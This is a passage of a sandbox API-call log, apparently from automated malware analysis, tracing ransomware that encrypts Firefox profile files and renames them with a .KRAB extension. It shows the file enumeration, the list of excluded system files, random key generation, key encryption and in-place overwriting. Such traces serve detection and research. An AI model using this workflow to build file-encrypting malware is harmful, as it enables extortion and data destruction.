CryptAcquireContextW (in: phProv=0x338dfac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dfac*=0x1011ab8) returned 1 [0081.329] CryptImportKey (in: hProv=0x1011ab8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dfb0 | out: phKey=0x338dfb0*=0x10235b8) returned 1 [0081.329] CryptGetKeyParam (in: hKey=0x10235b8, dwParam=0x8, pbData=0x338dfa4, pdwDataLen=0x338dfa8, dwFlags=0x0 | out: pbData=0x338dfa4*=0x800, pdwDataLen=0x338dfa8*=0x4) returned 1 [0081.329] CryptEncrypt (in: hKey=0x10235b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338dfdc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338dfdc*=0x100) returned 1 [0081.329] GetLastError () returned 0x0 [0081.329] CryptDestroyKey (hKey=0x10235b8) returned 1 [0081.330] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0081.330] CryptAcquireContextW (in: phProv=0x338dfac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dfac*=0x1011ab8) returned 1 [0081.331] CryptImportKey (in: hProv=0x1011ab8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dfb0 | out: phKey=0x338dfb0*=0x1023338) returned 1 [0081.331] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338dfa4, pdwDataLen=0x338dfa8, dwFlags=0x0 | out: pbData=0x338dfa4*=0x800, pdwDataLen=0x338dfa8*=0x4) returned 1 [0081.331] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338dfdc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338dfdc*=0x100) returned 1 [0081.332] GetLastError () returned 0x0 [0081.332] CryptDestroyKey (hKey=0x1023338) returned 1 [0081.332] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0081.332] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0081.332] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0081.333] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0081.333] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e07c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e07c*=0x9a8, lpOverlapped=0x0) returned 1 [0081.392] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xfffff658, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.392] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x9a8, lpNumberOfBytesWritten=0x338e078, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e078*=0x9a8, lpOverlapped=0x0) returned 1 [0081.392] WriteFile (in: hFile=0x484, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e078, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e078*=0x208, lpOverlapped=0x0) returned 1 [0081.392] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.405] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.405] CloseHandle (hObject=0x484) returned 1 [0081.406] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.406] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-widevinecdm\\1.4.8.903\\widevinecdm.dll.lib.krab")) returned 1 [0081.407] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.407] FindNextFileW (in: hFindFile=0x1023578, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 0 [0081.407] FindClose (in: hFindFile=0x1023578 | out: hFindFile=0x1023578) returned 1 [0081.407] CloseHandle (hObject=0x720) returned 1 [0081.407] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0081.407] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0081.407] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0081.408] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\d2ca4a08d2ca4dee3d.lock" [0081.408] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0081.408] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 124 [0081.408] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\d2ca4a08d2ca4dee3d.lock") returned 119 [0081.408] lstrlenW (lpString=".lock") returned 5 [0081.408] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0081.408] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0081.408] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.409] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.409] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0081.409] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0081.409] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0081.409] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\KRAB-DECRYPT.txt" [0081.409] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0081.409] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\KRAB-DECRYPT.txt.KRAB") returned 117 [0081.410] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\KRAB-DECRYPT.txt") returned 112 [0081.410] lstrlenW (lpString=".txt") returned 4 [0081.410] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0081.410] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0081.410] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.426] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\KRAB-DECRYPT.txt") returned 112 [0081.426] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-widevinecdm\\KRAB-DECRYPT.txt") returned 112 [0081.426] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0081.426] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0081.426] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0081.426] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0081.426] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0081.426] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0081.426] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0081.426] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0081.426] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0081.426] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0081.426] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.427] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0 [0081.427] FindClose (in: hFindFile=0x1023cb8 | out: hFindFile=0x1023cb8) returned 1 [0081.427] CloseHandle (hObject=0x7ec) returned 1 [0081.427] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0081.427] lstrcmpW (lpString1="key3.db", lpString2=".") returned 1 [0081.427] lstrcmpW (lpString1="key3.db", lpString2="..") returned 1 [0081.427] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="key3.db" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db" [0081.427] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0081.428] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db.KRAB") returned 92 [0081.428] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db") returned 87 [0081.428] lstrlenW (lpString=".db") returned 3 [0081.428] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0081.428] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".db ") returned 4 [0081.428] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.429] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db") returned 87 [0081.429] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db") returned 87 [0081.429] lstrcmpiW (lpString1="key3.db", lpString2="desktop.ini") returned 1 [0081.429] lstrcmpiW (lpString1="key3.db", lpString2="autorun.inf") returned 1 [0081.429] lstrcmpiW (lpString1="key3.db", lpString2="ntuser.dat") returned -1 [0081.429] lstrcmpiW (lpString1="key3.db", lpString2="iconcache.db") returned 1 [0081.429] lstrcmpiW (lpString1="key3.db", lpString2="bootsect.bak") returned 1 [0081.429] lstrcmpiW (lpString1="key3.db", lpString2="boot.ini") returned 1 [0081.429] lstrcmpiW (lpString1="key3.db", lpString2="ntuser.dat.log") returned -1 [0081.429] lstrcmpiW (lpString1="key3.db", lpString2="thumbs.db") returned -1 [0081.429] lstrcmpiW (lpString1="key3.db", lpString2="KRAB-DECRYPT.html") returned -1 [0081.429] lstrcmpiW (lpString1="key3.db", lpString2="KRAB-DECRYPT.txt") returned -1 [0081.429] lstrcmpiW (lpString1="key3.db", lpString2="CRAB-DECRYPT.txt") returned 1 [0081.429] lstrcmpiW (lpString1="key3.db", lpString2="ntldr") returned -1 [0081.429] lstrcmpiW (lpString1="key3.db", lpString2="NTDETECT.COM") returned -1 [0081.429] lstrcmpiW (lpString1="key3.db", lpString2="Bootfont.bin") returned 1 [0081.429] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0081.430] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1012338) returned 1 [0081.431] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0081.431] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0081.432] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0081.432] CryptGenRandom (in: hProv=0x1012338, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0081.432] CryptReleaseContext (hProv=0x1012338, dwFlags=0x0) returned 1 [0081.432] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.432] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1011ab8) returned 1 [0081.434] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0081.434] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0081.434] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0081.434] CryptGenRandom (in: hProv=0x1011ab8, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0081.434] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0081.434] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.435] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1012338) returned 1 [0081.436] CryptImportKey (in: hProv=0x1012338, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023cb8) returned 1 [0081.436] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0081.436] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0081.437] GetLastError () returned 0x0 [0081.437] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0081.437] CryptReleaseContext (hProv=0x1012338, dwFlags=0x0) returned 1 [0081.437] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1012338) returned 1 [0081.438] CryptImportKey (in: hProv=0x1012338, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023cb8) returned 1 [0081.438] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0081.438] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0081.439] GetLastError () returned 0x0 [0081.439] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0081.439] CryptReleaseContext (hProv=0x1012338, dwFlags=0x0) returned 1 [0081.439] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\key3.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7ec [0081.439] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0081.440] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0081.440] ReadFile (in: hFile=0x7ec, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e57c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e57c*=0x4000, lpOverlapped=0x0) returned 1 [0081.602] SetFilePointerEx (in: hFile=0x7ec, liDistanceToMove=0xffffc000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.602] WriteFile (in: hFile=0x7ec, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e578*=0x4000, lpOverlapped=0x0) returned 1 [0081.603] WriteFile (in: hFile=0x7ec, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e578, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e578*=0x208, lpOverlapped=0x0) returned 1 [0081.603] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.611] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.611] CloseHandle (hObject=0x7ec) returned 1 [0081.611] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.612] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\key3.db"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\key3.db.krab")) returned 1 [0081.613] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.618] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338e5d0 | out: lpFindFileData=0x338e5d0) returned 1 [0081.618] lstrcmpW (lpString1="kinto.sqlite", lpString2=".") returned 1 [0081.618] lstrcmpW (lpString1="kinto.sqlite", lpString2="..") returned 1 [0081.618] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="kinto.sqlite" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite" [0081.618] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0081.619] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite.KRAB") returned 97 [0081.619] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite") returned 92 [0081.619] lstrlenW (lpString=".sqlite") returned 7 [0081.619] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0081.619] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".sqlite ") returned 8 [0081.619] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.620] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite") returned 92 [0081.620] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite") returned 92 [0081.620] lstrcmpiW (lpString1="kinto.sqlite", lpString2="desktop.ini") returned 1 [0081.620] lstrcmpiW (lpString1="kinto.sqlite", lpString2="autorun.inf") returned 1 [0081.620] lstrcmpiW (lpString1="kinto.sqlite", lpString2="ntuser.dat") returned -1 [0081.620] lstrcmpiW (lpString1="kinto.sqlite", lpString2="iconcache.db") returned 1 [0081.620] lstrcmpiW (lpString1="kinto.sqlite", lpString2="bootsect.bak") returned 1 [0081.620] lstrcmpiW (lpString1="kinto.sqlite", lpString2="boot.ini") returned 1 [0081.620] lstrcmpiW (lpString1="kinto.sqlite", lpString2="ntuser.dat.log") returned -1 [0081.620] lstrcmpiW (lpString1="kinto.sqlite", lpString2="thumbs.db") returned -1 [0081.620] lstrcmpiW (lpString1="kinto.sqlite", lpString2="KRAB-DECRYPT.html") returned -1 [0081.620] lstrcmpiW (lpString1="kinto.sqlite", lpString2="KRAB-DECRYPT.txt") returned -1 [0081.620] lstrcmpiW (lpString1="kinto.sqlite", lpString2="CRAB-DECRYPT.txt") returned 1 [0081.620] lstrcmpiW (lpString1="kinto.sqlite", lpString2="ntldr") returned -1 [0081.620] lstrcmpiW (lpString1="kinto.sqlite", lpString2="NTDETECT.COM") returned -1 [0081.620] lstrcmpiW (lpString1="kinto.sqlite", lpString2="Bootfont.bin") returned 1 [0081.620] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0081.621] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1012338) returned 1 [0081.629] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0081.630] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0081.630] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0081.630] CryptGenRandom (in: hProv=0x1012338, dwLen=0x20, pbBuffer=0x338e54c | out: pbBuffer=0x338e54c) returned 1 [0081.630] CryptReleaseContext (hProv=0x1012338, dwFlags=0x0) returned 1 [0081.630] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.631] CryptAcquireContextW (in: phProv=0x338e4b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4b4*=0x1012338) returned 1 [0081.635] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0081.635] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0081.637] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0081.637] CryptGenRandom (in: hProv=0x1012338, dwLen=0x8, pbBuffer=0x338e56c | out: pbBuffer=0x338e56c) returned 1 [0081.637] CryptReleaseContext (hProv=0x1012338, dwFlags=0x0) returned 1 [0081.637] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.638] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1011ab8) returned 1 [0081.641] CryptImportKey (in: hProv=0x1011ab8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023cb8) returned 1 [0081.641] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0081.641] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0081.645] GetLastError () returned 0x0 [0081.645] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0081.645] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0081.645] CryptAcquireContextW (in: phProv=0x338e4ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e4ac*=0x1012338) returned 1 [0081.647] CryptImportKey (in: hProv=0x1012338, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e4b0 | out: phKey=0x338e4b0*=0x1023cb8) returned 1 [0081.647] CryptGetKeyParam (in: hKey=0x1023cb8, dwParam=0x8, pbData=0x338e4a4, pdwDataLen=0x338e4a8, dwFlags=0x0 | out: pbData=0x338e4a4*=0x800, pdwDataLen=0x338e4a8*=0x4) returned 1 [0081.647] CryptEncrypt (in: hKey=0x1023cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e4dc*=0x100) returned 1 [0081.663] GetLastError () returned 0x0 [0081.663] CryptDestroyKey (hKey=0x1023cb8) returned 1 [0081.663] CryptReleaseContext (hProv=0x1012338, dwFlags=0x0) returned 1 [0081.663] CreateFileW 